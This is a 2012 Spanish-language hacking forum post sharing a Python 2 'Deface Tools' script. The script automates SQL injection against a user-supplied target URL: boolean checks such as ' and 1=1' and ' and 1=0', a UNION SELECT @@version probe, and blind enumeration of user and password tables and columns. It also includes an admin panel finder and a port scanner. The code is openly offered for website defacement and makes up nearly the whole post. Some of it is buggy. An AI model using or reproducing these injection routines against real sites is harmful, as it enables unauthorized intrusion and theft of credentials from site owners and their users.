elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Deface Tools By Rune
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Deface Tools By Rune  (Leído 1,997 veces)
Runex

Desconectado Desconectado

Mensajes: 192


http://tutogramacion.blogspot.com


Ver Perfil WWW
Deface Tools By Rune
« en: 17 Marzo 2012, 19:23 pm »

La siguiente herramienta es un compendio de tools utilizadas en deface.
El programa consta de las siguientes características:
  
    ----> Admin Panel Finder
    ----> Check Vulnerability
    ----> Ascii To Hex
    ----> Ascii To Binary
    ----> Show Tables
    ----> Show Columns
    ----> Show Version DB
    ----> Port Scanner
    ----> View Web Code

Recuerdo que el programa no es sustituto de nuestras manos :) y solo sirve para inyecciones que salgan redondas, sin necesidad de modificar algún carácter o cualquier detalle mínimo.

Dejo aquí el code :)

Código
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # Autor: Rune
  4. # Fecha: 17/03/12
  5. #:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  6. #:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  7.  
  8. import urllib,os,string
  9.  
  10.  
  11. def check_ports(): #Funcion de escaneo de puertos
  12. print """  
  13.  _____            _      _____                                    
  14. |  __ \         | |    / ____|                                  
  15. | |__) |___  _ __| |_  | (___   ___  __ _ _ __  _ __   ___ _ __  
  16. |  ___// _ \| '__| __|  \___ \ / __|/ _` | '_ \| '_ \ / _ \ '__|  
  17. | |   | (_) | |  | |_   ____) | (__| (_| | | | | | | |  __/ |    
  18. |_|    \___/|_|   \__| |_____/ \___|\__,_|_| |_|_| |_|\___|_|     """
  19.  
  20. tablapuertos = []
  21. errores = ["error","Error","inactiva","Inactiva","no ha podido establecer","!Vaya\xc2"]
  22. print "\n\n [+] Port Scanner [+]"
  23. print "\n[+] Introduce la web objetivo"
  24. target = raw_input("\nTarget>")
  25. print "\n[+] Escaneando puertos, puede llevar varios minutos..."
  26. print "\n[+] Puertos escaneados:\n"
  27. for puerto in range(0,65535): # Rango de 0, al total de puertos existente
  28. try:
  29. x = urllib.urlopen(target+":"+str(puerto))
  30. for error in errores:
  31. if error in x.read():
  32. tablapuertos.append(puerto)
  33. print "Puerto " + str(puerto)
  34. except:
  35. print "[-] No se ha podido establecer conexion con el servidor"
  36. raw_input()
  37. os.system("clear")
  38. init()
  39. if string.join(tablapuertos) == "":
  40. print "[-] No se ha encontrado abierto ningun puerto"
  41. raw_input()
  42. os.system("clear")
  43. init()
  44. else:
  45. print "\n [+] Puertos Abiertos [+]\n"
  46. for elemento in tablapuertos:
  47. print "----> " + elemento
  48.  
  49. def show_version(): # Funcion Mostrar Version
  50. print """
  51.   _____ _                    __      __            _            
  52.  / ____| |                   \ \   / /           (_)            
  53. | (___ | |__   _____      __  \ \ / /___ _ __ ___ _  ___  _ __  
  54.  \___ \| '_ \ / _ \ \ /\ / /   \ \/ // _ \ '__/ __| |/ _ \| '_ \
  55.  ____) | | | | (_) \ V  V /     \ /|  __/ |  \__ \ | (_) | | | |
  56. |_____/|_| |_|\___/ \_/\_/       \/  \___|_|  |___/_|\___/|_| |_|
  57.                                                                  """
  58. print "\n\n [+] Show Version [+]"
  59. tablaversiones = ["3.23","4.0.0","4.0.3","4.0.6","4.0.12","4.0.24","4.0.30","4.1.0","4.1.3","4.1.4","4.1.7","4.1.9","4.1.18","4.1.23","4.1.23","4.1.25","5.0.0","5.0.1","5.0.3","5.0.13","5.0.15","5.0.19","5.0.30","5.0.50","5.0.76","5.0.90","5.0.91","5.1.3","5.1.5","5.1.15","5.1.22","5.1.30","5.1.31","5.1.43","5.5.0","5.5.3"]
  60. # Tablaversiones contiene todas las versiones de MySql hasta la actualidad
  61. print "\n[+] Introduce la web objetivo"
  62. version = ""
  63. web = raw_input("Target>")
  64. inyeccion = web + " and 1=0 union select @@version"
  65. try:
  66. t = urllib.urlopen(inyeccion).read()
  67. for versionx in tablaversiones:
  68. if versionx in t:
  69. version = version + versionx
  70. if version != "":
  71. print "\n[+] La version del servidor SQL es --> " + version
  72. raw_input()
  73. os.system("clear")
  74. init()
  75. else:
  76. print "\n[-] No se ha podido indentificar la version"
  77. raw_input()
  78. os.system("clear")
  79. init()
  80. except:
  81. print "\n[-] No se ha podido realizar la inyeccion, compruebe la url"
  82. raw_input()
  83. os.system("clear")
  84. init()
  85.  
  86. def show_columns2(): # Funcion Muestra columnas redireccionada desde init()
  87. print """  
  88.   _____ __                     ______       __                          
  89.  / ___// /_  ____ _      __   / ____/____  / /__  ______ ___  ____  _____
  90.  \__ \/ __ \/ __ \ | /| / /  / /    / __ \/ // / / / __ `__ \/ __ \/ ___/
  91. ___/ / / / / /_/ / |/ |/ /  / /___ / /_/ / // /_/ / / / / / / / / (__  )
  92. /____/_/ /_/\____/|__/|__/   \____/ \____/_/ \__,_/_/ /_/ /_/_/ /_/____/  """
  93. print "\n\n [+] Show Columns [+]"
  94. columnas = ["nombres","id","nonmbre","user","username","nombre","Nombre","name","pass","password","contrase\xf1a","clave","contrasena","email","correo","usuario","usuarios","admin","administrador"]
  95. # Las columnas mas frecuentes con informacion importante ;)
  96. column = [] # Lista donde se guardaran las columnas encontradas
  97. print "\n[+] Inserte la web objetivo"
  98. web = raw_input("Target>")
  99. try:
  100. s = urllib.urlopen(web).read() # Abrimos la web inicial (leer codigo)
  101. except:
  102. print "\n[-] No se ha podido conectar con el servidor"
  103. raw_input()
  104. os.system("clear")
  105. init()
  106. print "\n [/] Inserte la tabla que desea investigar"
  107. table = raw_input(">")
  108. for elemento in columnas:
  109. inyeccion = web + " and (select(count("+elemento+")) from " + table + ");"
  110. x = urllib.urlopen(inyeccion).read() # Abrimos la web con la inyeccion
  111. if x == s: #Si el codigo de la web no varia, la columna, es la que buscamos
  112. column.append(elemento)# Anadimos la columna, con la cual el codigo no varia a la lista column
  113. if string.join(column) != "": # Si la lista column, no esta vacia nos indica que hay columnas
  114. print "\n\n [+] Columnas Encontradas [+] "
  115. for elementoxs in column:
  116. print "----> " + elementoxs #Las muestra
  117. raw_input()
  118. os.system("clear")
  119. init()
  120. else: # Si la lista esta vacia, columnas 0
  121. print "\n\n [-] No se ha encontrado ninguna columna de usuario"
  122. raw_input()
  123. os.system("clear")
  124. init()
  125.  
  126.  
  127.  
  128. def show_columns1(web,tabla): # Funcion mostrar columnas, redireccionada desde show_tables()
  129. print """  
  130.   _____ __                     ______       __                          
  131.  / ___// /_  ____ _      __   / ____/____  / /__  ______ ___  ____  _____
  132.  \__ \/ __ \/ __ \ | /| / /  / /    / __ \/ // / / / __ `__ \/ __ \/ ___/
  133. ___/ / / / / /_/ / |/ |/ /  / /___ / /_/ / // /_/ / / / / / / / / (__  )
  134. /____/_/ /_/\____/|__/|__/   \____/ \____/_/ \__,_/_/ /_/ /_/_/ /_/____/  """
  135. print "\n\n [+] Show Columns [+]"
  136. columnas = ["nombres","id","nonmbre","user","username","nombre","Nombre","name","pass","password","contrase\xf1a","clave","contrasena","email","correo","usuario","usuarios","admin","administrador"]
  137. # Las columnas mas frecuentes con informacion importante ;)
  138. column = [] # Lista donde se guardaran las columnas encontradas
  139. print "\n [+] Tablas [+]"
  140. for el in tabla: # Mostramos las tablas anteriormente encontradas para la visualizacion del usuario
  141. print "----> " + el
  142. try:
  143. s = urllib.urlopen(web).read() # Abrimos la web inicial (leer codigo)
  144. except:
  145. print "\n[-] No se ha podido conectar con el servidor"
  146. raw_input()
  147. os.system("clear")
  148. init()
  149. print "\n [/] Inserte la tabla que desea investigar"
  150. table = raw_input(">")
  151. for elemento in columnas:
  152. inyeccion = web + " and (select(count("+elemento+")) from " + table + ");"
  153. x = urllib.urlopen(inyeccion).read() # Abrimos la web con la inyeccion
  154. if x == s: #Si el codigo de la web no varia, la columna, es la que buscamos
  155. column.append(elemento) # Anadimos la columna, con la cual el codigo no varia a la lista column
  156. if string.join(column) != "": # Si la lista column, no esta vacia nos indica que hay columnas
  157. print "\n\n [+] Columnas Encontradas [+] "
  158. for elementoxs in column:
  159. print "----> " + elementoxs # Las muestra
  160. raw_input()
  161. os.system("clear")
  162. init()
  163. else: # Si la lista esta vacia, columnas 0
  164. print "\n\n [-] No se ha encontrado ninguna columna de usuario"
  165. raw_input()
  166. os.system("clear")
  167. init()
  168.  
  169.  
  170.  
  171.  
  172.  
  173.  
  174. def view_code():
  175. print """
  176.   _____           _       __      ___              
  177.  / ____|         | |      \ \   / (_)              
  178. | |      ___   __| | ___   \ \ / / _  _____      __
  179. | |     / _ \ / _` |/ _ \  \ \/ / | |/ _ \ \ /\ / /
  180. | |____| (_) | (_| |  __/    \ /  | |  __/\ V  V /
  181.  \_____|\___/ \__,_|\___|     \/   |_|\___| \_/\_/  
  182.                                                     """
  183. print "\n\n [+] View Code [+]"
  184. print "\n[+] Inserte la url de la web"
  185. print "[+] El codigo tambien se guardara en un archivo"
  186. url = raw_input("\nTarget>") # Introducimos la web objetivo
  187. try:
  188. x = urllib.urlopen(url).read() # Abrimos la web en modo lectura
  189. except:
  190. print "\n[-] La url no es valida"
  191. raw_input()
  192. os.system("clear")
  193. init()
  194. print x
  195. web = url.replace("/","")  # Creamos una variable que sistituya los / por espacios en blanco para poder guardar el archivo
  196. f = open(web+".txt","w") # Creamos un archivo con el nombre de la web en extension .txt
  197. f.write(x) # Escribimos el codigo sobre el
  198. f.close() # Y cerramos
  199. print "\n[+] Pulse cualquier tecla para volver..."
  200. raw_input()
  201. os.system("clear")
  202. init()
  203.  
  204.  
  205.  
  206. def vuln2(web): # Funcion de chequeo de vulnerabilidades 2
  207. print """  
  208. _    __       __                       __    _ ___ __      
  209. | |  / /__  __/ /____  ___  _________ _/ /_  (_) (_) /___  __
  210. | | / // / / / // __ \/ _ \/ ___/ __ `/ __ \/ / / / __/ / / /
  211. | |/ // /_/ / // / / /  __/ /  / /_/ / /_/ / / / / /_/ /_/ /
  212. |___/ \__,_/_//_/ /_/\___/_/   \__,_/_.___/_/_/_/\__/\__, /  
  213.                                                    /____/ """
  214.  
  215. print "\n\n [+] Check Vulnerability [+]"
  216. print "\n[+] Relizando un segundo escaneo..."
  217. errores = ["Warning","Sql","MySql","warning","sql","SQL","MySQL"]
  218. variable = 0
  219. inyeccion = web + "'" # Declaramos la inyeccion, que sera igual que la web con comillas simples al final
  220. try:
  221. vulnerable = urllib.urlopen(inyeccion) # Abrimos la web
  222. for error in errores:
  223. if error in vulnerable.read(): # Y por cada error en la lista errores, si este error existe en el codigo, le sumamos 1 a variable
  224. variable = variable + 1
  225.  
  226. if variable != 0: # Si variable es diferente de cero, indica que ha encontrado errores en el codigo, por tanto sera vulnerable
  227. print "\n[+] El segundo escaneo indica que es vulnerable sin embargo, es de poca fiabilidad"
  228. raw_input()
  229. os.system("clear")
  230. init()
  231.  
  232. else: # Al ser la variable igual que 0, no ha encontrado ningun error, y no es vulnerable
  233. print "\n[-] Definitivamente la web no es vulnerable"
  234. raw_input()
  235. os.system("clear")
  236. init()
  237. except:
  238. print " [-] Error en la comprobacion reeintente"
  239. raw_input()
  240. os.system("clear")
  241. init()
  242.  
  243.  
  244. def show_tables(): # Funcion Muestra Tablas
  245. print """
  246.   _____ __                     ______       __    __          
  247.  / ___// /_  ____ _      __   /_  __/____ _/ /_  / /___  _____
  248.  \__ \/ __ \/ __ \ | /| / /    / /  / __ `/ __ \/ // _ \/ ___/
  249. ___/ / / / / /_/ / |/ |/ /    / /  / /_/ / /_/ / //  __(__  )
  250. /____/_/ /_/\____/|__/|__/    /_/   \__,_/_.___/_/ \___/____/ """
  251. print "\n\n [+] Show Tables [+]"
  252. tablas = ["users","admin","administrador","administrator","user","members","member","adm","nombres","cuentas","accounts","usuarios","wp-admin","wp-users"]
  253. # Tablas de usuarios mas frecuentes ;)
  254. tabla = [] # Lista vacia para almacenar las tablas encontradas
  255. web = raw_input("\n\n[/]Target>")
  256. print "[+] Localizando tablas de usuarios..."
  257. try:
  258. s = urllib.urlopen(web).read() # Abrimos la web inicial en modo lectura
  259. except:
  260. print "[-] No se ha podido conectar al servidor, revise la url"
  261. raw_input()
  262. os.system("clear")
  263. init()
  264. for elemento in tablas:
  265. inyeccion = " and (select(count(*)) from " + elemento + ");" # Declaramos el codigo de la inyeccion
  266. try:
  267. t = urllib.urlopen(web+inyeccion).read() # Abrimos la url de la web + inyeccion en modo lectura
  268. except:
  269. print "\n[-] No se ha podido realizar la inyeccion"
  270. raw_input()
  271. os.system("clear")
  272. init()
  273. if t == s: # Si el codigo no varia, la tabla es la que buscabamos
  274. tabla.append(elemento) # Insertamos la tabla localizada en la lista vacia
  275. print "\n\n [+] Tablas Encontradas [+] "
  276. for el1 in tabla: # Y aqui las imprimimos
  277. print "---> " + el1
  278. print "\n[+] Quiere continuar extrayendo las columnas?" # Ahora nos da opcion de continuar o no con las columnas, si continuamos nos redirige a show_columns1()
  279. print "0 ----> Si"
  280. print "1 ----> No"
  281. lecc = input("\n>")
  282. if lecc == 0:
  283. os.system("clear")
  284. show_columns1(web,tabla)
  285. else:
  286. os.system("clear")
  287. init()
  288.  
  289.  
  290.  
  291. def textTobin(): # Funcion encargada de convertir ascii a binario
  292. print """
  293.  ___           _ _   _____      ______ _      
  294. / _ \        (_|_) |_   _|     | ___ (_)      
  295. / /_\ \___  ___ _ _    | | ___   | |_/ /_ _ __  
  296. |  _  / __|/ __| | |   | |/ _ \ | ___ \ | '_ \
  297. | | | \__ \ (__| | |   | | (_) | | |_/ / | | | |
  298. \_| |_/___/\___|_|_|   \_/\___/  \____/|_|_| |_|"""
  299.  
  300. print "\n\n [+] Ascii To Bin [+]"
  301. bina = ''
  302. textoa = raw_input("\n\n[/] Texto Ascii>")
  303. print "\n[+] Conversion [+]"
  304. for letra in textoa: # Por cada letra en la cadena, convertimos cada una en binario y posteriormente las concatenamos
  305. bina = bina + bin(ord(letra))
  306. bina = bina.replace('b','') #Sustituyendo las 'b' creadas por espacios en blanco
  307. print bina
  308. raw_input()
  309. os.system("clear")
  310. init()
  311.  
  312. def textTohex(): # Funcion encargada de convertir ascii a hexadecimal
  313. print """
  314.  ______            __     ______          __  __          
  315. /_  __/___   _  __/ /_   /_  __/____     / / / /___   _  __
  316.  / /  / _ \ | |/_/ __/    / /  / __ \  / /_/ // _ \ | |/_/
  317. / /  /  __/_>  </ /_     / /  / /_/ /  / __  //  __/_>  <  
  318. /_/   \___//_/|_|\__/    /_/   \____/  /_/ /_/ \___//_/|_|"""
  319. print "\n\n [+] Ascii To Hex [+]"
  320. textoa = raw_input("\n\n[/]Texto Ascii>")
  321. hexa = ''
  322. print "\n[+] Conversion [+]"
  323. for letra in textoa: # Por cada letra en la cadena, convertimos cada una en hexadecimal y posteriormente las concatenamos
  324. hexa = hexa + hex(ord(letra))
  325. hexa = "0x%s" %hexa.replace('0x','') # Sustituyendo los '0x' creados por espacios en blanco menos el primero
  326. print hexa
  327. raw_input()
  328. os.system("clear")
  329. init()
  330.  
  331. def check_vuln(): # Funcion de chequeo de vulnerabilidades SQL
  332. print """  
  333. _    __       __                       __    _ ___ __      
  334. | |  / /__  __/ /____  ___  _________ _/ /_  (_) (_) /___  __
  335. | | / // / / / // __ \/ _ \/ ___/ __ `/ __ \/ / / / __/ / / /
  336. | |/ // /_/ / // / / /  __/ /  / /_/ / /_/ / / / / /_/ /_/ /
  337. |___/ \__,_/_//_/ /_/\___/_/   \__,_/_.___/_/_/_/\__/\__, /  
  338.                                                    /____/ """
  339.  
  340. print "\n\n [+] Check Vulnerability [+]"
  341. web = raw_input("\n\n[/]Target>")
  342. print "\n[+] Comprobando vulnerabilidad"
  343. comando1 = " and 1=1" # Comandos de la inyeccion 1
  344. comando2 = " and 1=0" # Comandos de la inyeccion 2
  345. try:
  346. # Abrimos las diferentes urls, para compararlas posteriormente
  347. n = urllib.urlopen(web).read()
  348. p = urllib.urlopen(web+comando1).read()
  349. t = urllib.urlopen(web+comando2).read()
  350. if p != t and p==n: # Si la inyeccion and 1=1 es igual al codigo de la web normal y es diferente al codigo de 1 = 0 es Vulnerable
  351. print "\n[+] El servidor es vulnerable a SQL, continue con la inyeccion"
  352. raw_input()
  353. os.system("clear")
  354. init()
  355. else: # De lo contrario la web no es vulnerable y nos da la opcion de realizar un 2 escaneo
  356. print "\n[-] El servidor no es vulnerable a SQL en su primer escaneo, quiere realizar un segundo?"
  357. print "\n0---->Si"
  358. print "1---->No"
  359. eleccion = input("\n>")
  360. if eleccion == 0:
  361. os.system("clear")
  362. vuln2(web)
  363. else:
  364. raw_input()
  365. os.system("clear")
  366. init()
  367.  
  368. except:
  369. print "[-] No se ha podido conectar al servidor, revise la Url"
  370. raw_input()
  371. os.system("clear")
  372. init()
  373.  
  374. def buscaPanel(): # Funcion que localizara el admin panel
  375. print """  
  376.    ____                   __   _______            __          
  377.   / __ \____ _____  ___  / /  / ____(_)____  ____/ /___  _____
  378.  / /_/ / __ `/ __ \/ _ \/ /  / /_  / // __ \/ __  // _ \/ ___/
  379. / ____/ /_/ / / / /  __/ /  / __/ / // / / / /_/ //  __/ /    
  380. /_/    \__,_/_/ /_/\___/_/  /_/   /_//_/ /_/\__,_/ \___/_/    
  381.                                                               """
  382. print "\n\n [+] Admin Panel Finder [+]"
  383. s = raw_input("\n\n[/]Target>")  # Introducimos la web a investigar
  384. f = open("Paneles.txt","r") #Abrimos el archivo Paneles.txt que contiene los paneles mas frecuentes
  385. tabla =[]
  386. i = 0
  387. try:
  388. p = urllib.urlopen(s + "/dasfdsdvd").read() # Leemos el codigo de una pagina inexistente en la web
  389. print "[+] Buscando paneles, esta busqueda puede tomar varios segundos/minutos"
  390. for elemento in f.readlines(): # Leemos las lineas del archivo de texto, cada linea contiene un panel
  391. t = urllib.urlopen(s+elemento).read() # Y abrimos en modo lectura, la url de la web + el panel
  392. if t != p: # Si el codigo del panel es diferente al de la web inexistente, Bingo! (Problema) Puede mostrar errores distintos, "mejorar nueva version"
  393. tabla2 = tabla.insert(i,elemento) # Guarda en una lista los paneles encontrados
  394. print "\n [+] Paneles encontrados:\n"
  395. for x in tabla:
  396. print s + x # Y aqui los muestra
  397. raw_input()
  398. os.system("clear")
  399. init()
  400. except:
  401. print "[-] Ningun Panel Encontrado / Web invalida"
  402. raw_input()
  403. os.system("clear")
  404. init()
  405. def init():
  406. print """  
  407.    ____       ____                    __              __    
  408.   / __ \___  / __/____ _________     / /_____  ____  / /_____
  409.  / / / / _ \/ /_ / __ `/ ___/ _ \  / __/ __ \/ __ \/ // ___/
  410. / /_/ /  __/ __// /_/ / /__/  __/  / /_/ /_/ / /_/ / /(__  )
  411. /_____/\___/_/   \__,_/\___/\___/   \__/\____/\____/_//____/ """
  412. print "\n\n [+] Menu Principal[+]\n "
  413. print "0------> Admin Panel Finder"
  414. print "1------> Check Vulnerability"
  415. print "2------> Ascii To Hex"
  416. print "3------> Ascii To Binary"
  417. print "4------> Show Tables"
  418. print "5------> Show Columns"
  419. print "6------> Show Version DB"
  420. print "7------> Port Scanner"
  421. print "8------> View Web Code\n"
  422. eleccion = input("[/] Que desea hacer?>")
  423. if eleccion == 0:
  424. os.system("clear")
  425. buscaPanel()
  426. elif eleccion == 1:
  427. os.system("clear")
  428. check_vuln()
  429. elif eleccion == 2:
  430. os.system("clear")
  431. textTohex()
  432. elif eleccion == 3:
  433. os.system("clear")
  434. textTobin()
  435. elif eleccion == 4:
  436. os.system("clear")
  437. show_tables()
  438. elif eleccion == 5:
  439. os.system("clear")
  440. show_columns2()
  441. elif eleccion == 6:
  442. os.system("clear")
  443. show_version()
  444. elif eleccion == 7:
  445. os.system("clear")
  446. check_ports()
  447. elif eleccion == 8:
  448. os.system("clear")
  449. view_code()
  450. else:
  451. print "[-] El numero introducido no es valido"
  452. raw_input()
  453. os.system("clear")
  454. init()
  455. init()
  456.  
  457. # The End!
  458.  


Y eso es todo compañeros, espero que sea de vuestro agrado, hay algunos errores, pero generalmente funciona bien.
En posteriores versiones implementaré la opción de extraer datos de las columnas :)

Un saludo :)



« Última modificación: 17 Marzo 2012, 20:57 pm por Runex » En línea

"No renunciaría al bambú.
Nunca renuciaría a ti.
No te compares con otros" "El me dijo:
El bambú tenía un propósito diferente al del
helecho, sin embargo eran necesarios y
hacían del bosque un lugar hermoso".
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[download] Net Tools 4.5 mais de 150 tools em 1
Hacking
thorking 3 5,048 Último mensaje 11 Febrero 2013, 08:51 am
por Crazy.sx
Deface a rthacker.net lol? « 1 2 ... 5 6 »
Foro Libre
qw3rty404 59 24,108 Último mensaje 18 Septiembre 2010, 23:37 pm
por Jaixon Jax
Deface a ForoSpyware
Noticias
VanX 4 3,614 Último mensaje 11 Julio 2011, 19:48 pm
por $Edu$
FTP Client Python By Rune
Scripting
Runex 0 1,824 Último mensaje 17 Marzo 2012, 15:02 pm
por Runex
Wargames By Rune
Desarrollo Web
Runex 0 1,897 Último mensaje 2 Mayo 2012, 21:15 pm
por Runex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines